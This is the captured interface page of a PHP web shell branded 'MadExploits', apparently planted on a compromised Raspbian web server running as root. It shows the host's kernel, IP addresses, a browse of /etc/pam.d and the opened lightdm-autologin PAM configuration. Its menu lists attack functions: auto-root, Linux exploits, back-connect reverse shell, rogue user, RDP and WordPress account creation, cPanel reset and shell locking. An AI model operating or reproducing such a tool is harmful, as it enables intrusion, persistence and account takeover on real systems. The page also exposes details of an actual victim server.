Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
pam.d /
[ HOME SHELL ]
Name
Size
Permission
Action
chfn
384
B
-rw-r--r--
chpasswd
92
B
-rw-r--r--
chsh
581
B
-rw-r--r--
common-account
1.18
KB
-rw-r--r--
common-auth
1.19
KB
-rw-r--r--
common-password
1.41
KB
-rw-r--r--
common-session
1.2
KB
-rw-r--r--
common-session-noninteractive
1.13
KB
-rw-r--r--
cron
606
B
-rw-r--r--
cups
69
B
-rw-r--r--
lightdm
1.32
KB
-rw-r--r--
lightdm-autologin
1.39
KB
-rw-r--r--
lightdm-greeter
493
B
-rw-r--r--
login
4.83
KB
-rw-r--r--
newusers
92
B
-rw-r--r--
other
520
B
-rw-r--r--
passwd
92
B
-rw-r--r--
polkit-1
270
B
-rw-r--r--
runuser
143
B
-rw-r--r--
runuser-l
138
B
-rw-r--r--
samba
84
B
-rw-r--r--
smtp
454
B
-rw-r--r--
sshd
2.08
KB
-rw-r--r--
su
2.2
KB
-rw-r--r--
su-l
137
B
-rw-r--r--
sudo
95
B
-rw-r--r--
systemd-user
317
B
-rw-r--r--
vncserver
537
B
-rw-r--r--
xscreensaver
108
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lightdm-autologin
#%PAM-1.0 # Block login if they are globally disabled auth requisite pam_nologin.so # Load environment from /etc/environment and ~/.pam_environment session required pam_env.so readenv=1 session required pam_env.so readenv=1 envfile=/etc/default/locale # Allow access without authentication auth required pam_succeed_if.so user != root quiet_success auth required pam_permit.so @include common-account # SELinux needs to be the first session rule. This ensures that any # lingering context has been cleared. Without out this it is possible # that a module could execute code in the wrong domain. # When the module is present, "required" would be sufficient (When SELinux # is disabled, this returns success.) session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close session required pam_limits.so session required pam_loginuid.so @include common-session # SELinux needs to intervene at login time to ensure that the process # starts in the proper default security context. Only sessions which are # intended to run in the user's context should be run after this. session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open # When the module is present, "required" would be sufficient (When SELinux # is disabled, this returns success.) # Can't change password password required pam_deny.so @include common-password
Close